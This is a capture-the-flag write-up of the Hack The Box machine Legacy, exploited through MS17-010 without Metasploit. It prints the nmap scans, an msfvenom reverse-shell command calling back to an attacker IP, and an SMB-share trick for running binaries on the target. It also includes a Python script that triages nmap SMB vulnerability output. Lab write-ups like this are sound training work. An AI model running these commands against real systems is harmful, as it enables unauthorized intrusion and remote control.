Hack The Box — Legacy — without Metasploit (TJNull’s list for OSCP)
This is my 23rd write-up for Legacy, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.
In a general penetration test or a CTF, there are usually 3 major phases that are involved.
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
First, let’s run an nmap scan on default ports to see what services are running on the target system.
nmap -sC -sV -T4 -A legacy.htb
So we have ports 139 and 445 open, and nmap also detects that the OS could possibly be Windows XP. The first thing that comes to my mind is the well-known vulnerability ‘EternalBlue’, AKA ‘MS17-010’. Well, if you don’t know about this vulnerability, no need to worry. Nmap can detect it for you if you run the smb-vuln* scripts against the target.
nmap --script smb-vuln* -p139,445 legacy.htb
It tells us that the SMB service that’s running is vulnerable to MS17-010 and MS08-067.
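When the same scan is run across more than one host it is easier to triage the smb-vuln* results from nmap’s XML report (-oX) than from the terminal output. The script below is an added example for this write-up, not code from the original post or from nmap: it assumes the scan was saved with -oX and reads the script/table/elem entries that the vulns NSE library emits, reporting every table whose state is VULNERABLE. The XML embedded in it is constructed for the demo and only approximates a real report.

```python
"""Triage nmap smb-vuln* results from an XML report saved with -oX.

Added example, not part of the original write-up. Assumes the report was
produced by:  nmap --script "smb-vuln*" -p139,445 -oX scan.xml <host>
"""
import xml.etree.ElementTree as ET

# Constructed sample report (abridged): one host, two positive findings and
# one script that produced no result table.
SAMPLE_XML = """<nmaprun scanner="nmap">
  <host>
    <address addr="10.10.10.4" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="139"><state state="open"/></port>
      <port protocol="tcp" portid="445"><state state="open"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
      <script id="smb-vuln-ms08-067" output="VULNERABLE">
        <table key="CVE-2008-4250">
          <elem key="title">Microsoft Windows system vulnerable to remote code execution (MS08-067)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
      <script id="smb-vuln-ms10-054" output="false"/>
    </hostscript>
  </host>
</nmaprun>
"""


def smb_findings(xml_text):
    """Return (host, script_id, table_key, state, title) for every smb-vuln* table."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        # iter() covers both <hostscript> and per-port <script> entries.
        for script in host.iter("script"):
            sid = script.get("id", "")
            if not sid.startswith("smb-vuln"):
                continue
            for table in script.findall("table"):
                elems = {e.get("key"): (e.text or "").strip() for e in table.findall("elem")}
                findings.append((addr, sid, table.get("key"),
                                 elems.get("state", "UNKNOWN"), elems.get("title", "")))
    return findings


def vulnerable_hosts(xml_text):
    """Map host address -> sorted table keys (CVE ids) whose state is VULNERABLE."""
    out = {}
    for addr, _sid, key, state, _title in smb_findings(xml_text):
        # The vulns library also emits "VULNERABLE (Exploitable)", hence startswith.
        if state.upper().startswith("VULNERABLE"):
            out.setdefault(addr, []).append(key)
    return {h: sorted(keys) for h, keys in out.items()}


if __name__ == "__main__":
    for addr, sid, key, state, title in smb_findings(SAMPLE_XML):
        print(f"{addr} {sid:<20} {key:<14} {state:<10} {title}")
    print(vulnerable_hosts(SAMPLE_XML))
```

To use it on a real report, replace SAMPLE_XML with the contents of the -oX file; hosts that never appear in the result are the ones where no smb-vuln script produced a table, which is worth checking manually rather than treating as clean.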
Initial Foothold
Since we are not using Metasploit, we will look for an exploit online. And this is what I found.
I simply git cloned it, and there are a lot of Python scripts there.
I am gonna generate my own Windows reverse shell using msfvenom and then use send_and_execute.py to upload it and run it on the target.
I tried a staged reverse shell, but that didn’t work; it just crashes right after getting the connection. So I am gonna use a non-staged shell here.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.32 LPORT=4242 -f exe > shell.exe
Now, let’s start the listener on port 4242 and then run the exploit against the target with this shell.exe that we just generated.
And we got a shell!
The current working directory is C:\Windows\system32, so there’s a very high probability that we got an NT AUTHORITY\SYSTEM (root) shell. But let’s check it anyway.
whoami
The target doesn’t have whoami.exe. We will transfer that from our attacking machine.
Since the target doesn’t have wget, netcat, socat, curl, or PowerShell, we will just run an SMB server on our Kali machine and use that.
locate smbserver.py
I am gonna use this python3-impacket SMB server. (You may need to install impacket for this. If your impacket is having problems, use this tool to fix it: https://github.com/Dewalt-arch/pimpmykali).
cp /usr/share/doc/python3-impacket/examples/smbserver.py .
I just copied that script to my current directory. Now I will locate and copy whoami.exe to my current directory.
locate whoami.exe
cp /usr/share/windows-resources/binaries/whoami.exe .
Now let’s run the smbserver.py and host an SMB share.
python3 smbserver.py DaemonExala /root/TJNull/Windows/Legacy/MS17-010
DaemonExala is the name of the share that I created, and /root/TJNull/Windows/Legacy/MS17-010 is the directory that I hosted on that share, containing my whoami.exe file.
Now let’s run the following command on the target to connect to our SMB and run the whoami executable.
\\10.10.16.32\DaemonExala\whoami.exe
And we are, in fact, NT AUTHORITY\SYSTEM (root).
No Privilege Escalation required.
EZ :)